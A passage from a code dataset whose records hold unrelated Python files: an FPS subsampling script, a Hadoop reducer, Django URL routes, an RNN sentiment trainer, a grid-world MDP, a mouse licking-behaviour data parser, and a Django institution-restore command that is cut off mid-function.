> 1:\n sys.stdout.write('Selecting FPS Points from subsample...\\n')\n newIdxs = np.concatenate(newIdxs)\n subFPS = np.concatenate(subFPS)\n\n # Do FPS on the concatenated FPS points\n if args.qfps > 0:\n idxs = SOAPTools.quick_FPS(subFPS.T, D=args.fps, cutoff=args.qfps)\n np.savetxt('%s/quickFPS.idxs' % args.output, newIdxs[idxs], fmt='%d')\n elif args.fps > 0:\n idxs = SOAPTools.do_FPS(subFPS, D=args.fps)\n np.savetxt('%s/FPS.idxs' % args.output, newIdxs[idxs], fmt='%d')\n\n# If we only have one batch,\n# we don't need to subselect, just save and exit\nelse:\n newIdxs = np.asarray(newIdxs).flatten()\n if args.qfps > 0:\n np.savetxt('%s/quickFPS.idxs' % args.output, newIdxs, fmt='%d')\n elif args.fps > 0:\n np.savetxt('%s/FPS.idxs' % args.output, newIdxs, fmt='%d')\n\n# Random selection\nif args.nr > 0:\n randomIdxs = range(0, nEnv)\n np.random.shuffle(randomIdxs)\n randomIdxs = randomIdxs[0:args.nr]\n randomIdxs.sort()\n np.savetxt('%s/random.idxs' % args.output, randomIdxs, fmt='%d')\n\n","sub_path":"Scripts/FPS.py","file_name":"FPS.py","file_ext":"py","file_size_in_byte":3188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"154512006","text":"import sys\n#\n# >>> Escriba el codigo del reducer a partir de este punto <<<\n#\nif __name__ == '__main__':\n \n\tlines = sys.stdin.readlines()\n\n\tfor line in lines:\n\t\tif line[3] not in ['1', '4', 1, 4, None, ' ', '\\n', '\\t']:\n\t\t\t#print(line[0])\n\t\t\tsys.stdout.write(\"{},{}{}\\n\".format(line[0],line[2],line[3]))\n\t\telse:\n\t\t\t#print(\"nada\")\n\t\t\tsys.stdout.write(\"{},{}{}\".format(line[0],line[2],line[3]))\n","sub_path":"01-hadoop-50/q04-10/reducer.py","file_name":"reducer.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"376320464","text":"from django.conf.urls import url\nfrom . import views\n\n\nurlpatterns = [\n\turl(r'^zhudi$',views.zhudi_table_list , name='zhudi_table_list'),\n url(r'zhudi/(?P\\d+)/$',views.zhudi_table_detail , name='zhudi_table_detail'),\n url(r'zhudi/create/$',views.zhudi_table_create , name='zhudi_table_create'),\n url(r'zhudi/(?P\\d+)/delete/$',views.zhudi_table_delete , name='zhudi_table_delete'),\n url(r'zhudi/create_session/$',views.zhudi_session_create , name='zhudi_session_create'),\n url(r'zhudi/delete_session/(?P\\d+)$',views.zhudi_session_delete , name='zhudi_session_delete'),\n\turl(r'^zuxun$',views.zuxun_table_list , name='zuxun_table_list'),\n\turl(r'zuxun/(?P\\d+)/$',views.zuxun_table_detail , name='zuxun_table_detail'),\n\turl(r'zuxun/create/$',views.zuxun_table_create , name='zuxun_table_create'),\n\turl(r'zuxun/(?P\\d+)/delete/$',views.zuxun_table_delete , name='zuxun_table_delete'),\n\turl(r'zuxun/create_session/$',views.zuxun_session_create , name='zuxun_session_create'),\n\turl(r'zuxun/delete_session/(?P\\d+)$',views.zuxun_session_delete , name='zuxun_session_delete'),\n\n]","sub_path":"train/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"371395057","text":"from utils import *\nfrom model import *\n\ntrain_path = './data/training_label.txt'\ntest_path = './data/testing_data.txt'\n\nntoken = 10000\nsave_path='./result/'\n###=========================================================\n### Load and preprocessing the data\n###=========================================================\n\nX_data, Y_data = load_train_data(train_path)\nprint(len(Y_data), Y_data[:10])\nprint(len(X_data), X_data[0])\nprint(len(X_data), X_data[1])\nshow_break()\n\ndictionary, rev_dictionary = build_dict(X_data)\nprint('dictionary length: ', len(dictionary))\n\nX_data_num = word2num(X_data, dictionary)\nprint(len(X_data_num), X_data_num[0])\nprint(len(X_data_num), X_data_num[1])\nshow_break()\n\nX_test_data = load_test_data(test_path)\nprint(len(X_test_data), X_test_data[0])\nprint(len(X_test_data), X_test_data[1])\nshow_break()\n\nX_test_num = word2num(X_test_data, dictionary)\nprint(len(X_test_num), X_test_num[0])\nprint(len(X_test_num), X_test_num[1])\nshow_break()\n###=========================================================\n### Build the model\n###=========================================================\nnet = Model(ntoken=ntoken)\nprint(net)\nshow_break()\n\ntry:\n\tnet = torch.load(save_path+'net.pkl')\n\tprint('Reload Net successfully~')\nexcept:\n\tprint('Start new training...')\nshow_break()\n\noptimizer = torch.optim.Adam(net.parameters(), lr=1e-4)\nloss_func = torch.nn.CrossEntropyLoss()\n\nloss_count = 0.0\nfor i in range(2000):\n\tb_x, b_y = get_minibatch(X_data_num, Y_data, batch_size=32, max_l=20)\n\tb_x = torch.from_numpy(b_x).type(torch.int64)\n\tb_y = torch.from_numpy(b_y).type(torch.int64)\n\n\t# show_break()\n\t# print(type(b_x), type(b_y), b_x.shape, b_y.shape)\n\n\toutput = net(b_x)\n\tloss = loss_func(output, b_y)\n\tloss_count += loss.data.numpy()\n\n\toptimizer.zero_grad()\n\tloss.backward()\n\toptimizer.step()\n\n\tif (i+1) % 10 == 0:\n\n\t\tacc = cal_acc(output.data.numpy(), b_y.data.numpy())\n\t\tprint('Epoch: %d | loss: %.4f | acc: %.4f' % (i, loss_count/10, acc))\n\t\tloss_count = 0\n\t\tsave_model(net, save_path=save_path)\n\t\tprint('Save Model Successfully!')\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"LHY-ML/hw4-Text Sentiment Classification(RNN)/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"212356056","text":"def dayOfWeek(birthdayDate):\n m, d, y = [int(x) for x in birthdayDate.split('-')]\n\n Day = 0\n yp = y\n\n def checkLeap(year):\n if ((year % 4 == 0) and (year % 100 != 0)) or (year % 400 == 0):\n return True\n else:\n False\n\n if (d == 29) and (m == 2):\n while not (Day % 7 == 0 and Day > 0 and checkLeap(yp)):\n yp += 4\n if checkLeap(yp):\n Day += 5\n else:\n Day += 4\n\n return yp - y\n\n if m < 3:\n beforeLeap = True\n else:\n beforeLeap = False\n\n while not (Day % 7 == 0 and Day > 0):\n yp += 1\n if (checkLeap(yp - 1) and beforeLeap) or (checkLeap(yp) and (not beforeLeap)):\n Day += 2\n else:\n Day += 1\n\n return yp - y\n\n\nbirthdayDate = \"02-29-2016\"\n\nprint(dayOfWeek(birthdayDate))\n","sub_path":"Day_of_Week.py","file_name":"Day_of_Week.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"419048895","text":"from collections import namedtuple\n\nfrom mdp.distribution import Distribution\nfrom mdp.scenario import Scenario\nfrom mdp.state import State\nfrom mdp.action import Action, JointActionSpace\n\nGridParams = namedtuple('GridParams', ['x', 'y', 'w', 'h', 'rounds'])\nparams = GridParams(5, 5, 10, 10, 11)\nagent_name = 'Howie'\n\n\ndef initial_state():\n return State({'x': 0, 'y': 0, 'Round': 0})\n\n\ndef actions(state):\n \"\"\"Returns legal actions in the state.\"\"\"\n legal_actions = []\n\n if state['x'] > 0:\n legal_actions += ['left']\n if state['x'] < params.w:\n legal_actions += ['right']\n if state['y'] > 0:\n legal_actions += ['down']\n if state['y'] < params.h:\n legal_actions += ['up']\n\n return JointActionSpace({agent_name: legal_actions})\n\n\ndef transition(state, action):\n new_state_dict = dict(state.copy())\n\n act_str = action[agent_name]\n if act_str is 'right':\n new_state_dict['x'] += 1\n elif act_str is 'left':\n new_state_dict['x'] += -1\n elif act_str is 'up':\n new_state_dict['y'] += 1\n elif act_str is 'down':\n new_state_dict['y'] += -1\n\n new_state_dict['Round'] += 1\n\n return Distribution({State(new_state_dict): 1}) # a list of all possible outcomes and their associated probabilities\n\n\ndef end(state):\n return state['Round'] == params.rounds or (state['x'] == params.x and state['y'] == params.y)\n\n\ndef utility(old_state, action, new_state):\n \"\"\"\n Returns utility associated with given state.\n \"\"\"\n return int(new_state['x'] == params.x and new_state['y'] == params.y)* 0.9**(new_state['Round'])\n\n\ngrid_scenario = Scenario(initial_state=initial_state, actions=actions,\n transition=transition, utility=utility, end=end)\n","sub_path":"domains/single_agent/grid/grid_scenario.py","file_name":"grid_scenario.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"525888255","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\n this script is used for_double_delayed_c_reward in 2020.07 !!!!!\n\"\"\"\nfrom datetime import datetime\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom collections import OrderedDict\nimport os\nimport random\nimport matplotlib as mpl\nimport re\nimport csv\nimport pickle\n\n\n#%%\nclass Mouse_data:\n def __init__(self,mouse_id,filedir):\n self.mouse_id = mouse_id\n self.filedir = filedir\n self.filename = ''\n self.selected_filename = ''\n self.all_days = []\n \n self.training_type = []\n self.df_trials = {}\n self.trialtypes = []\n self.df_trials_iscorrect = {}\n self.df_trials_lick = {}\n self.df_eventcode = {}\n self.p_hit = {}\n self.p_correj = {}\n self.licking_actionwindow = {}\n self.licking_latency = {}\n self.licking_baselicking = {}\n self.stats = {}\n self.event_data = ''\n self.odor_bef = 3.0\n self.odor_on = 1.0\n self.delay = 2.5\n self.rew_after = 2\n \n\n def read_filename(self):\n filedir = self.filedir +'/{}'.format(self.mouse_id)\n filename = []\n for dirpath, dirnames, files in os.walk(filedir): # can walk through all levels down\n # print(f'Found directory: {dirpath}')\n for f_name in files:\n if f_name.endswith('.xlsx'):\n filename.append(dirpath+'/'+f_name)\n print(f_name)\n print('---------------------------------------------') \n print('The files have been loaded from the following paths')\n print(filename[-45:])\n self.filename = filename\n \n \n def select_dates(self):\n pass\n def delete_date(self, dates):\n for date in dates:\n self.all_days.remove(date)\n \n return self.all_days\n \n def create_eventcode(self, original = True): #{'date':df of eventcode} format from original CSV\n date_list = []\n df = {}\n training_type = []\n \n for file in self.filename:\n date = re.search(r\"(\\d{4}-\\d{1,2}-\\d{1,2}-\\d{1,2}-\\d{1,2})\",file).group(0) # extract date: must be like format 2020-02-10\n date_list.append(date) # create a list of emperiment date\n \n train_type = os.path.split(file)[-1][16:-5]\n training_type.append(train_type) ###\n \n \n data = pd.read_excel(file,header = 0 if original else None) #read orginal csv data\n data.columns = ['Time','Event','Type'] # rename columns\n \n df.update({date:data}) # create the dict of key: date and value: data dataframe\n self.df_eventcode = df #individual mouse event code data\n date_format = '%Y-%m-%d-%h-%s'\n index = np.argsort(date_list)\n self.all_days = [date_list[i] for i in index]\n self.training_type = [training_type[i] for i in index]\n \n print('---------------------------------------------')\n print('{0} has data from these days: {1}'.format(self.mouse_id,zip(self.all_days,self.training_type)))\n\n def create_trials(self): #{'date: df of trials}\n for index , date in enumerate(self.all_days):\n value = self.df_eventcode[date]\n \n new_df = self.generate_trials_dataframe(index,value)\n self.df_trials[date] = new_df\n print('{} done!'.format(date))\n \n \n def generate_trials_dataframe(self,index,ori_df):\n \n lick, trialtype, go_odor, nogo_odor, control_odor, water_on, water_off, trial_end = self.seperate_events(index,ori_df)\n d = {'trialtype' : trialtype, 'go_odor': go_odor, 'nogo_odor': nogo_odor, 'control_odor':control_odor,\n 'water_on':water_on,'water_off':water_off,'licking':lick,\n 'trial_end':trial_end}\n df_trial = pd.DataFrame(data = d)\n return df_trial\n \n \n def seperate_events(self,index_day,df):\n \n start_trials = 0\n lick = []\n trialtype = []\n go_odor = []\n nogo_odor = []\n control_odor = []\n water_on = []\n water_off = []\n trial_end = []\n print(index_day)\n \n for index, row in df.iterrows():\n if row['Event'] == 101: # trial start\n start_trials = row['Time'] \n temp_licks = []\n temp_go_odor_on = np.nan\n temp_go_odor_off = np.nan\n temp_nogo_odor_on = np.nan\n temp_nogo_odor_off = np.nan\n temp_control_odor_on = np.nan\n temp_control_odor_off = np.nan\n \n temp_water_on = np.nan\n temp_water_off = np.nan\n temp_trial_end = np.nan\n \n if row['Type'] == 'trial0':\n trialtype.append('go')\n elif row['Type'] == 'trial1':\n trialtype.append('no_go')\n elif row['Type'] == 'trial2':\n trialtype.append('background')\n elif row['Type'] == 'trial3':\n trialtype.append('go_omit')\n elif row['Type'] == 'trial4':\n trialtype.append('unpred_water')\n elif row['Type'] == 'trial5':\n trialtype.append('c_reward')\n elif row['Type'] == 'trial6':\n trialtype.append('c_omit')\n elif row['Type'] == 'trial7':\n trialtype.append('close_unpred_water')\n elif row['Type'] == 'trial8':\n trialtype.append('far_unpred_water')\n\n elif row['Event'] == 11:\n lick_time = row['Time'] - start_trials\n temp_licks.append(lick_time)\n\n elif row['Event'] == 131: # go odor on\n temp_go_odor_on=row['Time']- start_trials\n \n elif row['Event'] == 130:\n temp_go_odor_off=row['Time']- start_trials\n\n elif row['Event'] == 141: # no go odor on\n temp_nogo_odor_on=row['Time']- start_trials\n \n elif row['Event'] == 140:\n temp_nogo_odor_off=row['Time']- start_trials\n elif row['Event'] == 161: # no go odor on\n temp_control_odor_on=row['Time']- start_trials\n \n elif row['Event'] == 160:\n temp_control_odor_off=row['Time']- start_trials\n \n elif row['Event'] == 51: # water on\n temp_water_on=row['Time']- start_trials\n \n elif row['Event'] == 50:\n temp_water_off=row['Time']- start_trials\n\n elif row['Event'] == 100: #trial end\n temp_trial_end=row['Time']- start_trials\n \n lick.append(temp_licks)\n go_odor.append([temp_go_odor_on,temp_go_odor_off])\n \n nogo_odor.append([temp_nogo_odor_on,temp_nogo_odor_off])\n control_odor.append([temp_control_odor_on,temp_control_odor_off])\n water_on.append(temp_water_on)\n water_off.append(temp_water_off)\n trial_end.append(temp_trial_end)\n \n \n return lick, trialtype, go_odor, nogo_odor, control_odor, water_on, water_off, trial_end\n \n def create_trial_iscorrect(self): # create dataframe with trial number, correct or rewarded or not only for conditioning period\n for index , date in enumerate(self.all_days): \n value = self.df_trials[date]\n new_df = self.eval_trials_correct(value)\n new_df.insert(0,'trialtype',value['trialtype'])\n self.df_trials_iscorrect[date] = new_df\n print('create_trial_iscorrect done!')\n \n def eval_trials_correct(self, df):\n \n is_correct = []\n is_rewarded = []\n for index, row in df.iterrows():\n if row['trialtype'] == 'go':\n is_rewarded.append(1)\n if any(x > row['go_odor'][0] and x < row['go_odor'][1]+self.delay for x in row['licking']):\n is_correct.append(1)\n else:\n is_correct.append(0)\n \n elif row['trialtype'] == 'no_go':\n is_rewarded.append(0)\n if any(x > row['nogo_odor'][0] and x < row['nogo_odor'][1]+self.delay for x in row['licking']):\n is_correct.append(0)\n else:\n is_correct.append(1)\n \n elif row['trialtype'] == 'c_reward':\n is_rewarded.append(1)\n if any(x > row['control_odor'][0] and x < row['water_on'] for x in row['licking']):\n is_correct.append(1)\n else:\n is_correct.append(0)\n elif row['trialtype'] == 'c_omit':\n is_rewarded.append(0)\n if any(x > row['control_odor'][0] and x < row['control_odor'][1]+2*self.delay for x in row['licking']):\n is_correct.append(1)\n else:\n is_correct.append(0)\n \n elif row['trialtype'] == 'background':\n is_rewarded.append(0)\n if any(x > 0 and x < row['trial_end'] for x in row['licking']):\n is_correct.append(0)\n else:\n is_correct.append(1)\n \n elif row['trialtype'] == 'go_omit':\n is_rewarded.append(0)\n if any(x > row['go_odor'][0] and x < row['go_odor'][1]+self.delay for x in row['licking']):\n is_correct.append(1)\n else:\n is_correct.append(0)\n elif row['trialtype'] in ['unpred_water','close_unpred_water','far_unpred_water']:\n is_rewarded.append(1)\n is_correct.append(np.nan)\n d = {'is_Correct':is_correct,'is_Rewarded':is_rewarded}\n new_df = pd.DataFrame(d)\n return new_df\n \n def create_trial_lick(self):\n for index , date in enumerate(self.all_days):\n value = self.df_trials[date] \n new_df = self.lick_stats(value) \n new_df.insert(0,'trialtype',value['trialtype'])\n self.df_trials_lick[date] = new_df\n print('lick stats done!') \n \n def lick_stats(self, df):\n \n lick_num = []\n lick_rate = []\n lick_latent_odor = []\n lick_latent_rew = []\n lick_duration = []\n lick_rate_anti = []\n lick_rate_aftr = []\n tol_interval = self.odor_on + self.delay + self.rew_after\n anti_window = self.odor_on + self.delay\n lick_anti_list = []\n lick_aftr_list = []\n for index, row in df.iterrows():\n if row['trialtype'] in ['go','go_omit'] :\n \n lick_valid = [x for x in row['licking'] if x > row['go_odor'][0] and x < row['go_odor'][0]+tol_interval ] # valid licking: after odor on and 5.5 s after odor off\n #lickingrate for anticipitory period and after water period 3.5 respectively\n anti = [i for i in row['licking'] if i> row['go_odor'][0] and i< row['go_odor'][1]+self.delay] #anticipitory\n aftr = [i for i in row['licking'] if i> row['water_on'] and i< row['water_off']+self.rew_after] #after water\n rate_anti = len(anti)/anti_window \n rate_aftr = len(aftr)/self.rew_after \n #num of licking\n num = len(lick_valid)\n if num != 0:\n latency_odor = min(lick_valid)-row['go_odor'][0]# first licking after odor delivery on\n else:\n latency_odor = tol_interval\n if row['trialtype'] == 'go':\n if len(aftr) != 0:\n latency_rew = min(aftr)-row['water_on']# first licking after odor delivery on\n else:\n latency_rew = self.rew_after\n else:\n latency_rew = np.nan\n try: \n duration = max(anti)-min(anti) # anticipitory licking duration after odor presentation\n except:\n duration = np.nan\n \n elif row['trialtype'] == 'no_go':\n lick_valid = [x for x in row['licking'] if x > row['nogo_odor'][0] and x < row['nogo_odor'][0]+tol_interval ] # valid licking: after odor on and 5.5 s after odor off\n #inter-licking interval for anticipitory period and after water period\n anti = [i for i in row['licking'] if i> row['nogo_odor'][0] and i< row['nogo_odor'][1]+self.delay] #anticipitory\n aftr = [] \n rate_anti = len(anti)/anti_window \n rate_aftr = np.nan \n #num of licking\n num = len(lick_valid)\n if num != 0:\n latency_odor = min(lick_valid)-row['nogo_odor'][0]# first licking after odor delivery on\n else:\n latency_odor = tol_interval\n latency_rew = np.nan\n try: \n duration = max(anti)-min(anti) # anticipitory licking duration after odor presentation\n except:\n duration = np.nan\n elif row['trialtype'] in ['c_reward','c_omit'] :\n \n lick_valid = [x for x in row['licking'] if x > row['control_odor'][0] and x < row['control_odor'][0]+tol_interval+self.delay ] # valid licking: after odor on and 5.5 s after odor off\n #lickingrate for anticipitory period and after water period 3.5 respectively\n anti = [i for i in row['licking'] if i> row['control_odor'][0] and i< row['water_on']] #anticipitory\n aftr = [i for i in row['licking'] if i> row['water_on'] and i< row['water_off']+self.rew_after] #after water\n rate_anti = len(anti)/(row['water_on']- row['control_odor'][0]) \n rate_aftr = len(aftr)/self.rew_after \n #num of licking\n num = len(lick_valid)\n if num != 0:\n latency_odor = min(lick_valid)-row['control_odor'][0]# first licking after odor delivery on\n else:\n latency_odor = row['water_on']- row['control_odor'][0]\n if row['trialtype'] == 'c_reward':\n if len(aftr) != 0:\n latency_rew = min(aftr)-row['water_on']# first licking after odor delivery on\n else:\n latency_rew = self.rew_after\n else:\n latency_rew = np.nan\n try: \n duration = max(anti)-min(anti) # anticipitory licking duration after odor presentation\n except:\n duration = np.nan\n \n elif row['trialtype'] == 'background':\n lick_valid = [x for x in row['licking'] if x > 0 and x < row['trial_end']] # valid licking: after odor on and 5.5 s after odor off\n intvl = row['trial_end']\n anti = lick_valid\n aftr = []\n rate_anti = len(anti)/intvl \n rate_aftr = np.nan \n num = len(lick_valid)\n latency_odor = np.nan\n latency_rew = np.nan\n duration = np.nan # licking duration after water delivery\n \n elif row['trialtype'] in ['unpred_water','close_unpred_water','far_unpred_water']:\n lick_valid = [x for x in row['licking'] if x > 0 and x < row['trial_end'] ] # valid licking: after odor on and 5.5 s after odor off \n #inter-licking interval for anticipitory period and after water period\n anti = [i for i in row['licking'] if i> 0 and i< row['water_on']] #anticipitory\n \n aftr = [i for i in row['licking'] if i> row['water_on'] and i < min((row['water_off']+self.rew_after),row['trial_end'])] \n rate_anti = len(anti)/(row['water_on']) \n rate_aftr = len(aftr)/min(self.rew_after,row['trial_end']-row['water_off']) \n #num of licking\n num = len(lick_valid)\n if len(aftr) != 0:\n latency_rew = min(aftr)-row['water_on']# first licking after unpredicted water\n else:\n latency_rew = min(self.rew_after,row['trial_end']-row['water_off'])\n latency_odor = np.nan\n try: \n duration = max(aftr)-min(aftr) # anticipitory licking duration after odor presentation\n except:\n duration = np.nan\n \n \n lick_num.append(num)\n lick_rate.append(num/tol_interval)\n lick_latent_odor.append(latency_odor)\n lick_latent_rew.append(latency_rew)\n lick_duration.append(duration)\n lick_rate_anti.append(rate_anti)\n lick_rate_aftr.append(rate_aftr)\n lick_anti_list.append(anti)\n lick_aftr_list.append(aftr)\n \n d = {'lick_num_whole_trial':lick_num,\n 'lick_rate_whole_trial':lick_rate,\n 'latency_to_odor':lick_latent_odor,\n 'latency_to_rew':lick_latent_rew,\n 'anti_duration':lick_duration,\n 'rate_antici':lick_rate_anti,\n 'rate_after':lick_rate_aftr,\n 'anti_lick':lick_anti_list,\n 'aftr_lick':lick_aftr_list\n }\n new_df = pd.DataFrame(d)\n return new_df\n \n\n \n \ndef save_to_excel(dict_df,path,filename):\n try:\n os.makedirs(path) # create the path first\n except FileExistsError:\n print('the path exist.')\n filename = path +'/{}.xlsx'.format(filename)\n\n # Create a Pandas Excel writer using XlsxWriter as the engine.\n writer = pd.ExcelWriter(filename, engine='xlsxwriter')\n \n # Write each dataframe to a different worksheet. you could write different string like above if you want\n for key, value in dict_df.items():\n value.to_excel(writer, sheet_name= key)\n \n \n # Close the Pandas Excel writer and output the Excel file.\n writer.save()\n print('save to excel done!')\n \ndef pickle_dict(df,path,filename):\n try:\n os.makedirs(path) # create the path first\n except FileExistsError:\n print('the path exist.')\n filename = path +'/{}.pickle'.format(filename)\n with open(filename, 'wb') as handle:\n pickle.dump(df, handle, protocol=pickle.HIGHEST_PROTOCOL)\n print('save to pickle done!')\n\n\ndef load_pickleddata(filename):\n \n with open(filename, 'rb') as handle:\n df = pickle.load(handle)\n return df\n \n \n\n#def sort_list(list1, list2): \n# \n# zipped_pairs = zip(list2, list1) \n# zipped = list(zipped_pairs) \n# \n# # Printing zipped list \n# print(\"Initial zipped list - \", str(zipped)) \n# \n# date_format = '%Y-%m-%d'\n# z = sorted(zipped,key=lambda date: datetime.strptime(date[1], date_format)) #\n# \n# # printing result \n# print(\"final list - \", str(res)) \n# \n# return z \n\n \n \n\n#%%\n#%% main code\nif __name__ == '__main__':\n \n is_save = True\n is_original = True # when use clean data, change it to False\n \n #********************\n load_path = 'D:/PhD/Behavior/behavior_21_02/close_far_2021_01_Pav/'\n \n # load file\n mouse_names = ['C38','C39','C40']\n # mouse_names = ['D2-04']\n for mouse_name in mouse_names:\n cute = Mouse_data(mouse_name, filedir = load_path)\n cute.read_filename()\n #parse data\n cute.create_eventcode(original = is_original)\n cute.create_trials()\n cute.create_trial_iscorrect() \n cute.create_trial_lick()\n \n \n if is_save:\n #save data by pickle\n #****************\n save_path = load_path+'/parsed_dataframe_pickle'\n \n filename = '{}_stats'.format(cute.mouse_id)\n pickle_dict(cute,save_path,filename)\n \n #save data to excel for just visualization (it'l all turn into string, so cannot be used later.)\n #****************\n save_path_excel = load_path+'/parsed_dataframe_spreadsheet'\n \n save_to_excel(cute.df_trials_iscorrect,save_path_excel,'{}_trial_iscorrect'.format(cute.mouse_id))\n save_to_excel(cute.df_trials_lick,save_path_excel,'{}_lick_stat'.format(cute.mouse_id))\n save_to_excel(cute.df_trials,save_path_excel,'{}_trials'.format(cute.mouse_id))\n save_to_excel(cute.df_eventcode,save_path_excel,'{}_eventcode'.format(cute.mouse_id)) \n#%% main code\nif __name__ == '__main__':\n \n is_save = True\n is_original = False # when use clean data, change it to False\n \n #********************\n load_path = 'D:/PhD/Behavior/behavior_21_01/experiment_data_2021_01_Pav/clean_data/'\n \n # load file\n # mouse_names = ['D1-05-TDT','D2-02','D2-04','D2-05-TDT']\n mouse_names = ['DAT-01']\n for mouse_name in mouse_names:\n cute = Mouse_data(mouse_name, filedir = load_path)\n cute.read_filename()\n #parse data\n cute.create_eventcode(original = is_original)\n cute.create_trials()\n cute.create_trial_iscorrect() \n cute.create_trial_lick()\n \n \n if is_save:\n #save data by pickle\n #****************\n save_path = load_path+'/parsed_dataframe_pickle'\n \n filename = '{}_stats'.format(cute.mouse_id)\n pickle_dict(cute,save_path,filename)\n \n #save data to excel for just visualization (it'l all turn into string, so cannot be used later.)\n #****************\n save_path_excel = load_path+'/parsed_dataframe_spreadsheet'\n \n save_to_excel(cute.df_trials_iscorrect,save_path_excel,'{}_trial_iscorrect'.format(cute.mouse_id))\n save_to_excel(cute.df_trials_lick,save_path_excel,'{}_lick_stat'.format(cute.mouse_id))\n save_to_excel(cute.df_trials,save_path_excel,'{}_trials'.format(cute.mouse_id))\n save_to_excel(cute.df_eventcode,save_path_excel,'{}_eventcode'.format(cute.mouse_id)) \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n","sub_path":"AntCamMS/parse_data_v2.py","file_name":"parse_data_v2.py","file_ext":"py","file_size_in_byte":23123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"52634062","text":"#!/usr/bin/env python\n\"\"\"Restores an Institution from \"stars-backup\" database into\n\"default\" db.\n\nAlso restores the Institution's SubmissionSets (and\nSubcategorySubmissions, CategorySubmissions, etc.).\n\nSpecify the Institution to restore by name.\n\n\"\"\"\nfrom django.core.management.base import BaseCommand\n\nfrom ...models import Institution\nfrom stars.apps.credits.models import Rating\nfrom stars.apps.institutions.models import (InstitutionPreferences,\n MigrationHistory,\n RegistrationSurvey,\n RespondentSurvey,\n StarsAccount,\n Subscription)\nfrom stars.apps.submissions.models import (CreditUserSubmission,\n DocumentationFieldSubmission,\n ResponsibleParty,\n SubmissionSet)\nfrom stars.apps.submissions.utils import get_documentation_field_submissions\n\n\nclass Command(BaseCommand):\n\n def handle(self, *args, **options):\n if len(args) == 1:\n restore_institution(name=args[0])\n else:\n print(\"ERROR: No Institution name specified.\")\n print(\"USAGE: manage.py restore_institution \")\n\n\ndef restore_institution(name,\n source_db=\"stars-backup\",\n target_db=\"default\"):\n \"\"\"Restores Institution from `source_db` database to `target_db` db.\n\n You specify the Institution to restore by name.\n\n In addition to an Institution object, related SubmissionSets,\n Subscriptions, ResponsiblePartys, and Ratings are restored.\n SubmissionSets and Subscriptions also restore objects related to\n them.\n\n \"\"\"\n try:\n institution_to_restore = (\n Institution.objects.using(source_db).get(name=name))\n except Institution.DoesNotExist:\n print(\"No Institution in {} db with name {}\".format(source_db, name))\n return\n\n # Restore the Institution.\n print(\"Institution {} restoring\".format(institution_to_restore.pk))\n institution_to_restore.save(using=target_db)\n\n # Restore SubmissionSets.\n submissionsets = Institution.objects.using(\n source_db).get(\n pk=institution_to_restore.pk).submissionset_set.all().order_by(\n \"-pk\")\n\n for submissionset in submissionsets:\n restore_submissionset(submissionset=submissionset,\n source_db=source_db,\n target_db=target_db)\n\n # Restore Subscriptions.\n subscriptions = Subscription.objects.using(source_db).filter(\n institution=institution_to_restore)\n\n for subscription in subscriptions:\n restore_subscription(subscription=subscription,\n source_db=source_db,\n target_db=target_db)\n\n # Restore ResponsiblePartys.\n for responsible_party in ResponsibleParty.objects.using(\n source_db).filter(institution=institution_to_restore):\n print(\"**Responsible Party {} restoring\".format(\n responsible_party.pk))\n responsible_party.save(using=target_db)\n print(\"**Responsible Party {} restored\".format(\n responsible_party.pk))\n\n # Restore StarsAccounts.\n for stars_account in StarsAccount.objects.using(\n source_db).filter(institution=institution_to_restore):\n print(\"**STARS Account {} restoring\".format(stars_account.pk))\n stars_account.save(using=target_db)\n print(\"***User {} restoring\".format(stars_account.user.pk))\n stars_account.user.save(using=target_db)\n print(\"***User {} restored\".format(stars_account.user.pk))\n print(\"**STARS Account {} restored\".format(stars_account.pk))\n\n # Restore MigrationHistorys.\n for migration_history in MigrationHistory.objects.using(\n source_db).filter(institution=institution_to_restore):\n print(\"**MigrationHistory {} restoring\".format(migration_history.pk))\n migration_history.save(using=target_db)\n print(\"**MigrationHistory {} restored\".format(migration_history.pk))\n\n # Restore RegistrationSurveys.\n for registration_survey in RegistrationSurvey.objects.using(\n source_db).filter(institution=institution_to_restore):\n print(\"**RegistrationSurvey {} restoring\".format(\n registration_survey.pk))\n registration_survey.save(using=target_db)\n print(\"**RegistrationSurvey {} restored\".format(\n registration_survey.pk))\n\n # Restore RespondentSurveys.\n for respondent_survey in RespondentSurvey.objects.using(\n source_db).filter(institution=institution_to_restore):\n print(\"**RespondentSurvey {} restoring\".format(respondent_survey.pk))\n respondent_survey.save(using=target_db)\n print(\"**RespondentSurvey {} restored\".format(respondent_survey.pk))\n\n # Restore InstitutionPreferences.\n for institution_preference in InstitutionPreferences.objects.using(\n source_db).filter(institution=institution_to_restore):\n print(\"**InstitutionPreference {} restoring\".format(\n institution_preference.pk))\n institution_preference.save(using=target_db)\n print(\"**InstitutionPreference {} restored\".format(\n institution_preference.pk))\n\n print(\"Institution {} restored\".format(institution_to_restore.pk))\n\n\ndef restore_submissionset(submissionset,\n source_db=\"stars-backup\",\n target_db=\"default\"):\n \"\"\"Restores `submissionset` and related CategorySubmissions from\n `source_db` to `target_db`.\n\n \"\"\"\n print(\"*SubmissionSet {} restoring\".format(submissionset.pk))\n date_created = submissionset.date_created\n submissionset.save(using=target_db,\n skip_init_credit_submissions=True)\n submissionset.date_created = date_created\n submissionset.save(using=target_db,\n skip_init_credit_submissions=True)\n\n category_submissions_to_restore = (\n submissionset.categorysubmission_set.using(source_db).all())\n for category_submission in category_submissions_to_restore:\n 